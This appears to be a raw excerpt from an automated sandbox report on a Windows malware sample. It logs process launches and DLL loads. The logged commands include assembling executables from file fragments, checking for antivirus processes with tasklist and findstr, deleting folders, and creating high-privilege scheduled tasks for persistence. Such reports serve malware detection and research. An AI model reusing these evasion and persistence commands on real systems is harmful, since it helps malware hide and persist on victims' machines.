                    Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Windows\SysWOW64\cmd.exe cmd /c md 787041Jump to behavior
                    Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Windows\SysWOW64\findstr.exe findstr /V "SenatorsRamAspectYounger" Boat Jump to behavior
                    Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Windows\SysWOW64\cmd.exe cmd /c copy /b Buffalo + Sims + Imagine 787041\lJump to behavior
                    Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Users\user\AppData\Local\Temp\787041\Hist.pif 787041\Hist.pif 787041\lJump to behavior
                    Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Windows\SysWOW64\timeout.exe timeout 15Jump to behavior
                    Source: C:\Users\user\AppData\Local\Temp\787041\Hist.pifProcess created: C:\ProgramData\EHIJJDGDHD.exe "C:\ProgramData\EHIJJDGDHD.exe" Jump to behavior
                    Source: C:\Users\user\AppData\Local\Temp\787041\Hist.pifProcess created: C:\Windows\SysWOW64\cmd.exe "C:\Windows\system32\cmd.exe" /c timeout /t 10 & rd /s /q "C:\ProgramData\JDAFIEHIEGDH" & exitJump to behavior
                    Source: C:\ProgramData\EHIJJDGDHD.exeProcess created: C:\Windows\SysWOW64\cmd.exe "C:\Windows\System32\cmd.exe" /k copy Approximate Approximate.cmd & Approximate.cmd & exitJump to behavior
                    Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Windows\SysWOW64\tasklist.exe tasklistJump to behavior
                    Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Windows\SysWOW64\findstr.exe findstr /I "wrsa.exe opssvc.exe" Jump to behavior
                    Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Windows\SysWOW64\tasklist.exe tasklistJump to behavior
                    Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Windows\SysWOW64\findstr.exe findstr /I "avastui.exe avgui.exe bdservicehost.exe nswscsvc.exe sophoshealth.exe" Jump to behavior
                    Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Windows\SysWOW64\cmd.exe cmd /c md 661592Jump to behavior
                    Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Windows\SysWOW64\findstr.exe findstr /V "RECEIVEFILLMEDIAEVALUATING" Natural Jump to behavior
                    Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Windows\SysWOW64\cmd.exe cmd /c copy /b Saturn + Demonstrated + Preceding + Eagles + Salon + Grows + Featured 661592\hJump to behavior
                    Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Users\user\AppData\Local\Temp\661592\Bk.pif 661592\Bk.pif 661592\hJump to behavior
                    Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Windows\SysWOW64\timeout.exe timeout 15Jump to behavior
                    Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Windows\SysWOW64\timeout.exe timeout /t 10
                    Source: C:\Users\user\AppData\Local\Temp\661592\Bk.pifProcess created: C:\Windows\SysWOW64\cmd.exe cmd /c schtasks.exe /create /tn "Chassis" /tr "wscript //B 'C:\Users\user\AppData\Local\SunCraft Innovations\SolarSys.js'" /sc daily /mo 1 /ri 3 /du 23:57 /F /RL HIGHEST
                    Source: C:\Users\user\AppData\Local\Temp\661592\Bk.pifProcess created: C:\Windows\SysWOW64\schtasks.exe schtasks.exe /create /tn "SolarSys" /tr "wscript //B 'C:\Users\user\AppData\Local\SunCraft Innovations\SolarSys.js'" /sc onlogon /F /RL HIGHEST
                    Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Windows\SysWOW64\schtasks.exe schtasks.exe /create /tn "Chassis" /tr "wscript //B 'C:\Users\user\AppData\Local\SunCraft Innovations\SolarSys.js'" /sc daily /mo 1 /ri 3 /du 23:57 /F /RL HIGHEST
                    Source: C:\Windows\System32\wscript.exeProcess created: C:\Users\user\AppData\Local\SunCraft Innovations\SolarSys.pif "C:\Users\user\AppData\Local\SunCraft Innovations\SolarSys.pif" "C:\Users\user\AppData\Local\SunCraft Innovations\Y"
                    Source: C:\Windows\System32\wscript.exeProcess created: C:\Users\user\AppData\Local\SunCraft Innovations\SolarSys.pif "C:\Users\user\AppData\Local\SunCraft Innovations\SolarSys.pif" "C:\Users\user\AppData\Local\SunCraft Innovations\Y"
                    Source: C:\Users\user\Desktop\mg9LPWGtPB.exeSection loaded: apphelp.dllJump to behavior
                    Source: C:\Users\user\Desktop\mg9LPWGtPB.exeSection loaded: version.dllJump to behavior
                    Source: C:\Users\user\Desktop\mg9LPWGtPB.exeSection loaded: kernel.appcore.dllJump to behavior
                    Source: C:\Users\user\Desktop\mg9LPWGtPB.exeSection loaded: uxtheme.dllJump to behavior
                    Source: C:\Users\user\Desktop\mg9LPWGtPB.exeSection loaded: shfolder.dllJump to behavior
                    Source: C:\Users\user\Desktop\mg9LPWGtPB.exeSection loaded: windows.storage.dllJump to behavior
                    Source: C:\Users\user\Desktop\mg9LPWGtPB.exeSection loaded: wldp.dllJump to behavior
                    Source: C:\Users\user\Desktop\mg9LPWGtPB.exeSection loaded: propsys.dllJump to behavior
                    Source: C:\Users\user\Desktop\mg9LPWGtPB.exeSection loaded: profapi.dllJump to behavior
                    Source: C:\Users\user\Desktop\mg9LPWGtPB.exeSection loaded: edputil.dllJump to behavior
                    Source: C:\Users\user\Desktop\mg9LPWGtPB.exeSection loaded: urlmon.dllJump to behavior
                    Source: C:\Users\user\Desktop\mg9LPWGtPB.exeSection loaded: iertutil.dllJump to behavior
                    Source: C:\Users\user\Desktop\mg9LPWGtPB.exeSection loaded: srvcli.dllJump to behavior
                    Source: C:\Users\user\Desktop\mg9LPWGtPB.exeSection loaded: netutils.dllJump to behavior
                    Source: C:\Users\user\Desktop\mg9LPWGtPB.exeSection loaded: windows.staterepositoryps.dllJump to behavior
                    Source: C:\Users\user\Desktop\mg9LPWGtPB.exeSection loaded: sspicli.dllJump to behavior
                    Source: C:\Users\user\Desktop\mg9LPWGtPB.exeSection loaded: wintypes.dllJump to behavior
                    Source: C:\Users\user\Desktop\mg9LPWGtPB.exeSection loaded: appresolver.dllJump to behavior
                    Source: C:\Users\user\Desktop\mg9LPWGtPB.exeSection loaded: bcp47langs.dllJump to behavior
                    Source: C:\Users\user\Desktop\mg9LPWGtPB.exeSection loaded: slc.dllJump to behavior
                    Source: C:\Users\user\Desktop\mg9LPWGtPB.exeSection loaded: userenv.dllJump to behavior
                    Source: C:\Users\user\Desktop\mg9LPWGtPB.exeSection loaded: sppc.dllJump to behavior
                    Source: C:\Users\user\Desktop\mg9LPWGtPB.exeSection loaded: onecorecommonproxystub.dllJump to behavior
                    Source: C:\Users\user\Desktop\mg9LPWGtPB.exeSection loaded: onecoreuapcommonproxystub.dllJump to behavior
                    Source: C:\Windows\SysWOW64\cmd.exeSection loaded: cmdext.dllJump to behavior
                    Source: C:\Windows\SysWOW64\cmd.exeSection loaded: apphelp.dllJump to behavior
                    Source: C:\Windows\SysWOW64\tasklist.exeSection loaded: version.dllJump to behavior
                    Source: C:\Windows\SysWOW64\tasklist.exeSection loaded: mpr.dllJump to behavior
                    Source: C:\Windows\SysWOW64\tasklist.exeSection loaded: framedynos.dllJump to behavior
                    Source: C:\Windows\SysWOW64\tasklist.exeSection loaded: dbghelp.dllJump to behavior
                    Source: C:\Windows\SysWOW64\tasklist.exeSection loaded: sspicli.dllJump to behavior
                    Source: C:\Windows\SysWOW64\tasklist.exeSection loaded: srvcli.dllJump to behavior
                    Source: C:\Windows\SysWOW64\tasklist.exeSection loaded: netutils.dllJump to behavior
                    Source: C:\Windows\SysWOW64\tasklist.exeSection loaded: sspicli.dllJump to behavior
                    Source: C:\Windows\SysWOW64\tasklist.exeSection loaded: kernel.appcore.dllJump to behavior
                    Source: C:\Windows\SysWOW64\tasklist.exeSection loaded: wbemcomn.dllJump to behavior
                    Source: C:\Windows\SysWOW64\tasklist.exeSection loaded: winsta.dllJump to behavior
                    Source: C:\Windows\SysWOW64\tasklist.exeSection loaded: amsi.dllJump to behavior
                    Source: C:\Windows\SysWOW64\tasklist.exeSection loaded: userenv.dllJump to behavior
                    Source: C:\Windows\SysWOW64\tasklist.exeSection loaded: profapi.dllJump to behavior
                    Source: C:\Windows\SysWOW64\tasklist.exeSection loaded: version.dllJump to behavior
                    Source: C:\Windows\SysWOW64\tasklist.exeSection loaded: mpr.dllJump to behavior
                    Source: C:\Windows\SysWOW64\tasklist.exeSection loaded: framedynos.dllJump to behavior
                    Source: C:\Windows\SysWOW64\tasklist.exeSection loaded: dbghelp.dllJump to behavior
                    Source: C:\Windows\SysWOW64\tasklist.exeSection loaded: sspicli.dllJump to behavior
                    Source: C:\Windows\SysWOW64\tasklist.exeSection loaded: srvcli.dllJump to behavior
                    Source: C:\Windows\SysWOW64\tasklist.exeSection loaded: netutils.dllJump to behavior
                    Source: C:\Windows\SysWOW64\tasklist.exeSection loaded: sspicli.dllJump to behavior
                    Source: C:\Windows\SysWOW64\tasklist.exeSection loaded: kernel.appcore.dllJump to behavior
                    Source: C:\Windows\SysWOW64\tasklist.exeSection loaded: wbemcomn.dllJump to behavior
                    Source: C:\Windows\SysWOW64\tasklist.exeSection loaded: winsta.dllJump to behavior
                    Source: C:\Windows\SysWOW64\tasklist.exeSection loaded: amsi.dllJump to behavior
                    Source: C:\Windows\SysWOW64\tasklist.exeSection loaded: userenv.dllJump to behavior
                    Source: C:\Windows\SysWOW64\tasklist.exeSection loaded: profapi.dllJump to behavior
                    Source: C:\Users\user\AppData\Local\Temp\787041\Hist.pifSection loaded: wsock32.dllJump to behavior
                    Source: C:\Users\user\AppData\Local\Temp\787041\Hist.pifSection loaded: version.dllJump to behavior
                    Source: C:\Users\user\AppData\Local\Temp\787041\Hist.pifSection loaded: winmm.dllJump to behavior
                    Source: C:\Users\user\AppData\Local\Temp\787041\Hist.pifSection loaded: mpr.dllJump to behavior
                    Source: C:\Users\user\AppData\Local\Temp\787041\Hist.pifSection loaded: wininet.dllJump to behavior
                    Source: C:\Users\user\AppData\Local\Temp\787041\Hist.pifSection loaded: iphlpapi.dllJump to behavior
                    Source: C:\Users\user\AppData\Local\Temp\787041\Hist.pifSection loaded: userenv.dllJump to behavior
                    Source: C:\Users\user\AppData\Local\Temp\787041\Hist.pifSection loaded: uxtheme.dllJump to behavior
                    Source: C:\Users\user\AppData\Local\Temp\787041\Hist.pifSection loaded: kernel.appcore.dllJump to behavior
                    Source: C:\Users\user\AppData\Local\Temp\787041\Hist.pifSection loaded: windows.storage.dllJump to behavior
                    Source: C:\Users\user\AppData\Local\Temp\787041\Hist.pifSection loaded: wldp.dllJump to behavior
                    Source: C:\Users\user\AppData\Local\Temp\787041\Hist.pifSection loaded: napinsp.dllJump to behavior
                    Source: C:\Users\user\AppData\Local\Temp\787041\Hist.pifSection loaded: pnrpnsp.dllJump to behavior
                    Source: C:\Users\user\AppData\Local\Temp\787041\Hist.pifSection loaded: wshbth.dllJump to behavior
                    Source: C:\Users\user\AppData\Local\Temp\787041\Hist.pifSection loaded: nlaapi.dllJump to behavior
                    Source: C:\Users\user\AppData\Local\Temp\787041\Hist.pifSection loaded: mswsock.dllJump to behavior
                    Source: C:\Users\user\AppData\Local\Temp\787041\Hist.pifSection loaded: dnsapi.dllJump to behavior
                    Source: C:\Users\user\AppData\Local\Temp\787041\Hist.pifSection loaded: winrnr.dllJump to behavior
                    Source: C:\Users\user\AppData\Local\Temp\787041\Hist.pifSection loaded: rasadhlp.dllJump to behavior
                    Source: C:\Users\user\AppData\Local\Temp\787041\Hist.pifSection loaded: sspicli.dllJump to behavior
                    Source: C:\Users\user\AppData\Local\Temp\787041\Hist.pifSection loaded: rstrtmgr.dllJump to behavior
                    Source: C:\Users\user\AppData\Local\Temp\787041\Hist.pifSection loaded: ncrypt.dllJump to behavior
                    Source: C:\Users\user\AppData\Local\Temp\787041\Hist.pifSection loaded: ntasn1.dllJump to behavior
                    Source: C:\Users\user\AppData\Local\Temp\787041\Hist.pifSection loaded: dbghelp.dllJump to behavior
                    Source: C:\Users\user\AppData\Local\Temp\787041\Hist.pifSection loaded: iertutil.dllJump to behavior
                    Source: C:\Users\user\AppData\Local\Temp\787041\Hist.pifSection loaded: profapi.dllJump to behavior
                    Source: C:\Users\user\AppData\Local\Temp\787041\Hist.pifSection loaded: ondemandconnroutehelper.dllJump to behavior
                    Source: C:\Users\user\AppData\Local\Temp\787041\Hist.pifSection loaded: winhttp.dllJump to behavior
                    Source: C:\Users\user\AppData\Local\Temp\787041\Hist.pifSection loaded: winnsi.dllJump to behavior
                    Source: C:\Users\user\AppData\Local\Temp\787041\Hist.pifSection loaded: urlmon.dllJump to behavior
                    Source: C:\Users\user\AppData\Local\Temp\787041\Hist.pifSection loaded: srvcli.dllJump to behavior
                    Source: C:\Users\user\AppData\Local\Temp\787041\Hist.pifSection loaded: netutils.dllJump to behavior
                    Source: C:\Users\user\AppData\Local\Temp\787041\Hist.pifSection loaded: fwpuclnt.dllJump to behavior
                    Source: C:\Users\user\AppData\Local\Temp\787041\Hist.pifSection loaded: schannel.dllJump to behavior
                    Source: C:\Users\user\AppData\Local\Temp\787041\Hist.pifSection loaded: mskeyprotect.dllJump to behavior
                    Source: C:\Users\user\AppData\Local\Temp\787041\Hist.pifSection loaded: msasn1.dllJump to behavior
                    Source: C:\Users\user\AppData\Local\Temp\787041\Hist.pifSection loaded: dpapi.dllJump to behavior
                    Source: C:\Users\user\AppData\Local\Temp\787041\Hist.pifSection loaded: cryptsp.dllJump to behavior
                    Source: C:\Users\user\AppData\Local\Temp\787041\Hist.pifSection loaded: rsaenh.dllJump to behavior
                    Source: C:\Users\user\AppData\Local\Temp\787041\Hist.pifSection loaded: cryptbase.dllJump to behavior
                    Source: C:\Users\user\AppData\Local\Temp\787041\Hist.pifSection loaded: gpapi.dllJump to behavior
                    Source: C:\Users\user\AppData\Local\Temp\787041\Hist.pifSection loaded: ncryptsslp.dllJump to behavior
                    Source: C:\Users\user\AppData\Local\Temp\787041\Hist.pifSection loaded: wbemcomn.dllJump to behavior
                    Source: C:\Users\user\AppData\Local\Temp\787041\Hist.pifSection loaded: amsi.dllJump to behavior
                    Source: C:\Users\user\AppData\Local\Temp\787041\Hist.pifSection loaded: ntmarta.dllJump to behavior
                    Source: C:\Users\user\AppData\Local\Temp\787041\Hist.pifSection loaded: mozglue.dllJump to behavior
                    Source: C:\Users\user\AppData\Local\Temp\787041\Hist.pifSection loaded: vcruntime140.dllJump to behavior
                    Source: C:\Users\user\AppData\Local\Temp\787041\Hist.pifSection loaded: msvcp140.dllJump to behavior
                    Source: C:\Users\user\AppData\Local\Temp\787041\Hist.pifSection loaded: windowscodecs.dllJump to behavior
                    Source: C:\Users\user\AppData\Local\Temp\787041\Hist.pifSection loaded: propsys.dllJump to behavior
                    Source: C:\Users\user\AppData\Local\Temp\787041\Hist.pifSection loaded: edputil.dllJump to behavior
                    Source: C:\Users\user\AppData\Local\Temp\787041\Hist.pifSection loaded: windows.staterepositoryps.dllJump to behavior
                    Source: C:\Users\user\AppData\Local\Temp\787041\Hist.pifSection loaded: wintypes.dllJump to behavior
                    Source: C:\Users\user\AppData\Local\Temp\787041\Hist.pifSection loaded: appresolver.dllJump to behavior
                    Source: C:\Users\user\AppData\Local\Temp\787041\Hist.pifSection loaded: bcp47langs.dllJump to behavior
                    Source: C:\Users\user\AppData\Local\Temp\787041\Hist.pifSection loaded: slc.dllJump to behavior
                    Source: C:\Users\user\AppData\Local\Temp\787041\Hist.pifSection loaded: sppc.dllJump to behavior
                    Source: C:\Users\user\AppData\Local\Temp\787041\Hist.pifSection loaded: onecorecommonproxystub.dllJump to behavior
                    Source: C:\Users\user\AppData\Local\Temp\787041\Hist.pifSection loaded: onecoreuapcommonproxystub.dllJump to behavior
                    Source: C:\Users\user\AppData\Local\Temp\787041\Hist.pifSection loaded: apphelp.dllJump to behavior
                    Source: C:\Users\user\AppData\Local\Temp\787041\Hist.pifSection loaded: pcacli.dllJump to behavior
                    Source: C:\Users\user\AppData\Local\Temp\787041\Hist.pifSection loaded: sfc_os.dllJump to behavior
                    Source: C:\Users\user\AppData\Local\Temp\787041\Hist.pifSection loaded: windows.fileexplorer.common.dllJump to behavior
                    Source: C:\Users\user\AppData\Local\Temp\787041\Hist.pifSection loaded: ntshrui.dllJump to behavior
                    Source: C:\Users\user\AppData\Local\Temp\787041\Hist.pifSection loaded: cscapi.dllJump to behavior
                    Source: C:\Users\user\AppData\Local\Temp\787041\Hist.pifSection loaded: linkinfo.dllJump to behavior
                    Source: C:\Windows\SysWOW64\timeout.exeSection loaded: version.dllJump to behavior
                    Source: C:\ProgramData\EHIJJDGDHD.exeSection loaded: apphelp.dllJump to behavior
                    Source: C:\ProgramData\EHIJJDGDHD.exeSection loaded: version.dllJump to behavior
                    Source: C:\ProgramData\EHIJJDGDHD.exeSection loaded: kernel.appcore.dllJump to behavior
                    Source: C:\ProgramData\EHIJJDGDHD.exeSection loaded: uxtheme.dllJump to behavior
                    Source: C:\ProgramData\EHIJJDGDHD.exeSection loaded: shfolder.dllJump to behavior
                    Source: C:\ProgramData\EHIJJDGDHD.exeSection loaded: windows.storage.dllJump to behavior
                    Source: C:\ProgramData\EHIJJDGDHD.exeSection loaded: wldp.dllJump to behavior
                    Source: C:\ProgramData\EHIJJDGDHD.exeSection loaded: propsys.dllJump to behavior
                    Source: C:\ProgramData\EHIJJDGDHD.exeSection loaded: profapi.dllJump to behavior
                    Source: C:\ProgramData\EHIJJDGDHD.exeSection loaded: edputil.dllJump to behavior
                    Source: C:\ProgramData\EHIJJDGDHD.exeSection loaded: urlmon.dllJump to behavior
                    Source: C:\ProgramData\EHIJJDGDHD.exeSection loaded: iertutil.dllJump to behavior
                    Source: C:\ProgramData\EHIJJDGDHD.exeSection loaded: srvcli.dllJump to behavior
                    Source: C:\ProgramData\EHIJJDGDHD.exeSection loaded: netutils.dllJump to behavior
                    Source: C:\ProgramData\EHIJJDGDHD.exeSection loaded: windows.staterepositoryps.dllJump to behavior
                    Source: C:\ProgramData\EHIJJDGDHD.exeSection loaded: sspicli.dllJump to behavior
                    Source: C:\ProgramData\EHIJJDGDHD.exeSection loaded: wintypes.dllJump to behavior
                    Source: C:\ProgramData\EHIJJDGDHD.exeSection loaded: appresolver.dllJump to behavior
                    Source: C:\ProgramData\EHIJJDGDHD.exeSection loaded: bcp47langs.dllJump to behavior
                    Source: C:\ProgramData\EHIJJDGDHD.exeSection loaded: slc.dllJump to behavior
                    Source: C:\ProgramData\EHIJJDGDHD.exeSection loaded: userenv.dllJump to behavior
                    Source: C:\ProgramData\EHIJJDGDHD.exeSection loaded: sppc.dllJump to behavior
                    Source: C:\ProgramData\EHIJJDGDHD.exeSection loaded: onecorecommonproxystub.dllJump to behavior
                    Source: C:\ProgramData\EHIJJDGDHD.exeSection loaded: onecoreuapcommonproxystub.dllJump to behavior
                    Source: C:\Windows\SysWOW64\cmd.exeSection loaded: ntmarta.dllJump to behavior
                    Source: C:\Windows\SysWOW64\cmd.exeSection loaded: cmdext.dllJump to behavior
                    Source: C:\Windows\SysWOW64\cmd.exeSection loaded: apphelp.dllJump to behavior
                    Source: C:\Windows\SysWOW64\tasklist.exeSection loaded: version.dll
                    Source: C:\Windows\SysWOW64\tasklist.exeSection loaded: mpr.dll
                    Source: C:\Windows\SysWOW64\tasklist.exeSection loaded: framedynos.dll
                    Source: C:\Windows\SysWOW64\tasklist.exeSection loaded: dbghelp.dll
                    Source: C:\Windows\SysWOW64\tasklist.exeSection loaded: sspicli.dll
                    Source: C:\Windows\SysWOW64\tasklist.exeSection loaded: srvcli.dll
                    Source: C:\Windows\SysWOW64\tasklist.exeSection loaded: netutils.dll
                    Source: C:\Windows\SysWOW64\tasklist.exeSection loaded: sspicli.dll
                    Source: C:\Windows\SysWOW64\tasklist.exeSection loaded: kernel.appcore.dll
                    Source: C:\Windows\SysWOW64\tasklist.exeSection loaded: wbemcomn.dll
                    Source: C:\Windows\SysWOW64\tasklist.exeSection loaded: winsta.dll
                    Source: C:\Windows\SysWOW64\tasklist.exeSection loaded: amsi.dll
                    Source: C:\Windows\SysWOW64\tasklist.exeSection loaded: userenv.dll
                    Source: C:\Windows\SysWOW64\tasklist.exeSection loaded: profapi.dll
                    Source: C:\Windows\SysWOW64\timeout.exeSection loaded: version.dll
                    Source: C:\Windows\SysWOW64\tasklist.exeSection loaded: version.dll
                    Source: C:\Windows\SysWOW64\tasklist.exeSection loaded: mpr.dll
                    Source: C:\Windows\SysWOW64\tasklist.exeSection loaded: framedynos.dll
                    Source: C:\Windows\SysWOW64\tasklist.exeSection loaded: dbghelp.dll
                    Source: C:\Windows\SysWOW64\tasklist.exeSection loaded: sspicli.dll
                    Source: C:\Windows\SysWOW64\tasklist.exeSection loaded: srvcli.dll
                    Source: C:\Windows\SysWOW64\tasklist.exeSection loaded: netutils.dll
                    Source: C:\Windows\SysWOW64\tasklist.exeSection loaded: sspicli.dll
                    Source: C:\Windows\SysWOW64\tasklist.exeSection loaded: kernel.appcore.dll
                    Source: C:\Windows\SysWOW64\tasklist.exeSection loaded: wbemcomn.dll
                    Source: C:\Windows\SysWOW64\tasklist.exeSection loaded: winsta.dll
                    Source: C:\Windows\SysWOW64\tasklist.exeSection loaded: amsi.dll
                    Source: C:\Windows\SysWOW64\tasklist.exeSection loaded: userenv.dll
                    Source: C:\Windows\SysWOW64\tasklist.exeSection loaded: profapi.dll
                    Source: C:\Users\user\AppData\Local\Temp\661592\Bk.pifSection loaded: wsock32.dll
                    Source: C:\Users\user\AppData\Local\Temp\661592\Bk.pifSection loaded: version.dll
                    Source: C:\Users\user\AppData\Local\Temp\661592\Bk.pifSection loaded: winmm.dll
                    Source: C:\Users\user\AppData\Local\Temp\661592\Bk.pifSection loaded: mpr.dll
                    Source: C:\Users\user\AppData\Local\Temp\661592\Bk.pifSection loaded: wininet.dll
                    Source: C:\Users\user\AppData\Local\Temp\661592\Bk.pifSection loaded: iphlpapi.dll
                    Source: C:\Users\user\AppData\Local\Temp\661592\Bk.pifSection loaded: userenv.dll
                    Source: C:\Users\user\AppData\Local\Temp\661592\Bk.pifSection loaded: uxtheme.dll
                    Source: C:\Users\user\AppData\Local\Temp\661592\Bk.pifSection loaded: kernel.appcore.dll
                    Source: C:\Users\user\AppData\Local\Temp\661592\Bk.pifSection loaded: windows.storage.dll
                    Source: C:\Users\user\AppData\Local\Temp\661592\Bk.pifSection loaded: wldp.dll
                    Source: C:\Users\user\AppData\Local\Temp\661592\Bk.pifSection loaded: ntmarta.dll
                    Source: C:\Users\user\AppData\Local\Temp\661592\Bk.pifSection loaded: napinsp.dll
                    Source: C:\Users\user\AppData\Local\Temp\661592\Bk.pifSection loaded: pnrpnsp.dll
                    Source: C:\Users\user\AppData\Local\Temp\661592\Bk.pifSection loaded: wshbth.dll
                    Source: C:\Users\user\AppData\Local\Temp\661592\Bk.pifSection loaded: nlaapi.dll
                    Source: C:\Users\user\AppData\Local\Temp\661592\Bk.pifSection loaded: mswsock.dll
                    Source: C:\Users\user\AppData\Local\Temp\661592\Bk.pifSection loaded: dnsapi.dll
                    Source: C:\Users\user\AppData\Local\Temp\661592\Bk.pifSection loaded: winrnr.dll
                    Source: C:\Users\user\AppData\Local\Temp\661592\Bk.pifSection loaded: rasadhlp.dll
                    Source: C:\Users\user\AppData\Local\Temp\661592\Bk.pifSection loaded: urlmon.dll
                    Source: C:\Users\user\AppData\Local\Temp\661592\Bk.pifSection loaded: iertutil.dll
                    Source: C:\Users\user\AppData\Local\Temp\661592\Bk.pifSection loaded: srvcli.dll
                    Source: C:\Users\user\AppData\Local\Temp\661592\Bk.pifSection loaded: netutils.dll
                    Source: C:\Users\user\AppData\Local\Temp\661592\Bk.pifSection loaded: rstrtmgr.dll
                    Source: C:\Users\user\AppData\Local\Temp\661592\Bk.pifSection loaded: ncrypt.dll
                    Source: C:\Users\user\AppData\Local\Temp\661592\Bk.pifSection loaded: ntasn1.dll
                    Source: C:\Users\user\AppData\Local\Temp\661592\Bk.pifSection loaded: sspicli.dll
                    Source: C:\Users\user\AppData\Local\Temp\661592\Bk.pifSection loaded: cryptsp.dll
                    Source: C:\Users\user\AppData\Local\Temp\661592\Bk.pifSection loaded: rsaenh.dll
                    Source: C:\Users\user\AppData\Local\Temp\661592\Bk.pifSection loaded: cryptbase.dll
                    Source: C:\Users\user\AppData\Local\Temp\661592\Bk.pifSection loaded: profapi.dll
                    Source: C:\Users\user\AppData\Local\Temp\661592\Bk.pifSection loaded: ondemandconnroutehelper.dll
                    Source: C:\Users\user\AppData\Local\Temp\661592\Bk.pifSection loaded: winhttp.dll
                    Source: C:\Users\user\AppData\Local\Temp\661592\Bk.pifSection loaded: winnsi.dll
                    Source: C:\Users\user\AppData\Local\Temp\661592\Bk.pifSection loaded: fwpuclnt.dll
                    Source: C:\Windows\SysWOW64\timeout.exeSection loaded: version.dll
                    Source: C:\Windows\SysWOW64\schtasks.exeSection loaded: kernel.appcore.dll
                    Source: C:\Windows\SysWOW64\schtasks.exeSection loaded: taskschd.dll
                    Source: C:\Windows\SysWOW64\schtasks.exeSection loaded: sspicli.dll
                    Source: C:\Windows\SysWOW64\schtasks.exeSection loaded: xmllite.dll
                    Source: C:\Windows\SysWOW64\schtasks.exeSection loaded: kernel.appcore.dll
                    Source: C:\Windows\SysWOW64\schtasks.exeSection loaded: taskschd.dll
                    Source: C:\Windows\SysWOW64\schtasks.exeSection loaded: sspicli.dll
                    Source: C:\Windows\SysWOW64\schtasks.exeSection loaded: xmllite.dll
                    Source: C:\Windows\System32\wscript.exeSection loaded: version.dll
                    Source: C:\Windows\System32\wscript.exeSection loaded: kernel.appcore.dll
                    Source: C:\Windows\System32\wscript.exeSection loaded: uxtheme.dll
                    Source: C:\Windows\System32\wscript.exeSection loaded: sxs.dll
                    Source: C:\Windows\System32\wscript.exeSection loaded: jscript.dll
                    Source: C:\Windows\System32\wscript.exeSection loaded: iertutil.dll
                    Source: C:\Windows\System32\wscript.exeSection loaded: amsi.dll
                    Source: C:\Windows\System32\wscript.exeSection loaded: userenv.dll
                    Source: C:\Windows\System32\wscript.exeSection loaded: profapi.dll
                    Source: C:\Windows\System32\wscript.exeSection loaded: wldp.dll
                    Source: C:\Windows\System32\wscript.exeSection loaded: msasn1.dll
                    Source: C:\Windows\System32\wscript.exeSection loaded: cryptsp.dll
                    Source: C:\Windows\System32\wscript.exeSection loaded: rsaenh.dll
                    Source: C:\Windows\System32\wscript.exeSection loaded: cryptbase.dll
                    Source: C:\Windows\System32\wscript.exeSection loaded: msisip.dll
                    Source: C:\Windows\System32\wscript.exeSection loaded: wshext.dll
                    Source: C:\Windows\System32\wscript.exeSection loaded: scrobj.dll
                    Source: C:\Windows\System32\wscript.exeSection loaded: mpr.dll
                    Source: C:\Windows\System32\wscript.exeSection loaded: scrrun.dll
                    Source: C:\Windows\System32\wscript.exeSection loaded: apphelp.dll
                    Source: C:\Windows\System32\wscript.exeSection loaded: version.dll
                    Source: C:\Windows\System32\wscript.exeSection loaded: kernel.appcore.dll
                    Source: C:\Windows\System32\wscript.exeSection loaded: uxtheme.dll
                    Source: C:\Windows\System32\wscript.exeSection loaded: sxs.dll
                    Source: C:\Windows\System32\wscript.exeSection loaded: jscript.dll
                    Source: C:\Windows\System32\wscript.exeSection loaded: iertutil.dll
                    Source: C:\Windows\System32\wscript.exeSection loaded: amsi.dll
                    Source: C:\Windows\System32\wscript.exeSection loaded: userenv.dll
                    Source: C:\Windows\System32\wscript.exeSection loaded: profapi.dll
                    Source: C:\Windows\System32\wscript.exeSection loaded: wldp.dll
                    Source: C:\Windows\System32\wscript.exeSection loaded: msasn1.dll
                    Source: C:\Windows\System32\wscript.exeSection loaded: cryptsp.dll
                    Source: C:\Windows\System32\wscript.exeSection loaded: rsaenh.dll
                    Source: C:\Windows\System32\wscript.exeSection loaded: cryptbase.dll
                    Source: C:\Windows\System32\wscript.exeSection loaded: msisip.dll
                    Source: C:\Windows\System32\wscript.exeSection loaded: wshext.dll
                    Source: C:\Windows\System32\wscript.exeSection loaded: scrobj.dll
                    Source: C:\Windows\System32\wscript.exeSection loaded: mpr.dll
                    Source: C:\Windows\System32\wscript.exeSection loaded: scrrun.dll
                    Source: C:\Users\user\AppData\Local\SunCraft Innovations\SolarSys.pifSection loaded: wsock32.dll
                    Source: C:\Users\user\AppData\Local\SunCraft Innovations\SolarSys.pifSection loaded: version.dll
                    Source: C:\Users\user\AppData\Local\SunCraft Innovations\SolarSys.pifSection loaded: winmm.dll
                    Source: C:\Users\user\AppData\Local\SunCraft Innovations\SolarSys.pifSection loaded: mpr.dll
                    Source: C:\Users\user\AppData\Local\SunCraft Innovations\SolarSys.pifSection loaded: wininet.dll
                    Source: C:\Users\user\AppData\Local\SunCraft Innovations\SolarSys.pifSection loaded: iphlpapi.dll
                    Source: C:\Users\user\AppData\Local\SunCraft Innovations\SolarSys.pifSection loaded: userenv.dll
                    Source: C:\Users\user\AppData\Local\SunCraft Innovations\SolarSys.pifSection loaded: uxtheme.dll
                    Source: C:\Users\user\AppData\Local\SunCraft Innovations\SolarSys.pifSection loaded: kernel.appcore.dll
                    Source: C:\Users\user\AppData\Local\SunCraft Innovations\SolarSys.pifSection loaded: windows.storage.dll
                    Source: C:\Users\user\AppData\Local\SunCraft Innovations\SolarSys.pifSection loaded: wldp.dll
                    Source: C:\Users\user\AppData\Local\SunCraft Innovations\SolarSys.pifSection loaded: wsock32.dll
                    Source: C:\Users\user\AppData\Local\SunCraft Innovations\SolarSys.pifSection loaded: version.dll
                    Source: C:\Users\user\AppData\Local\SunCraft Innovations\SolarSys.pifSection loaded: winmm.dll
